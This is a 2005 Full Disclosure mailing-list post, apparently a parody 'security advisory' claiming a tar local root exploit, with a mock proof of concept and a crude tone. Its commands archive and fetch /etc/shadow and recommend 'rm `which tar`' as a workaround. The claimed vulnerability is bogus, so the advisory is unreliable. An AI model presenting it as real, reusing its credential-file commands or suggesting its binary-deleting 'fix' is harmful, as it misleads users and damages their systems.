Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

UNIX Tar Security Advisory from TEAM PWN4GE
From: "Team Pwnge" <team_pwn4ge () outgun com>
Date: Thu, 03 Feb 2005 04:32:08 +0800

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
TEAM PWN4GE Security Advisory                                     PWNED
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: HIGH
     Title: TAR: Local root exploit using Tar
      Date: February 02, 2005

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An evil malicious, vile, disgusting, atrocious vulnerability has been
found to exist on Unix based machines with the tar binary.


Background
==========

TAR is a Unix based tool used to compress files. It is nowhere near
as functional or useable as WinZip, but nevertheless Unix users need
love too,

Affected versions
=================

All versions of Unix based variants using TAR can be pwn0rf13d.

Description
===========

Shotgun Willie of TEAM PWN4G3 discovered that an unobservant (l)user
can extract the contents of a tarball overwriting his shadow (or for)
those "others", master.passwd files leading to maximum pwn4ge.

Proof of Concept
================

# tar -cf parishiltonpr0n.tar /etc/shadow
# mv /path/to/htdocs/parishiltonpr0n.tar
# ssh pwn4ge () localhost
pwn4ge () localhost's password:
Last login: Wed Feb  2 14:48:41 2005 from sec.msft.com
Sun Microsystems Inc.   SunOS 5.10       PWN4GEKERNEL Jan 2005
You have mail.
$ wget www.(PROTECTEDSITENAME).net/parishiltonpr0n.tar
--15:42:02--  http://www.(PROTECTEDSITENAME).net/parishiltonpr0n.tar
           => `parishiltonpr0n.tar'
Resolving www.(PROTECTEDSITENAME).net... done.
Connecting to www.(PROTECTEDSITENAME).net[198.81.129.100]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,163 [application/x-tar]

100%[=================================================================================>] 1,163          1.11M/s    ETA 
00:00

15:42:02 (1.11 MB/s) - `rechecker.tar.gz' saved [1163/1163]
$ echo "w00t"
$ tar -xvf parishiltonpr0n.tar
tar: blocksize = 8
x /etc/shadow, 1100 bytes, 5 tape blocks
# echo "pwn3d d4t 3ss sux0r!@ h0 h0 h0"

Impact
======

All your nix belong to us.

Workaround
==========

On your shell: rm `which tar` & echo "Security is glorious amen"


Concerns?
=========

Security is a primary focus of TEAM PWN4GE and ensuring the
progress of a secure Interweb be our dreams and visions. As
security concerns should be addressed to respective vendors,
we feel the urge to bypass standards and bring our common
dreams of a secure homeland to the Interweb.

License
=======

Copyright 2005 TEAM PWN4GE

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
-- 
_______________________________________________
Outgun.com free e-mail @ www.outgun.com 
Check out our Premium services - POP3 downloading, e-mail forwarding, and 25MB mailboxes!

Powered by Outblaze

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault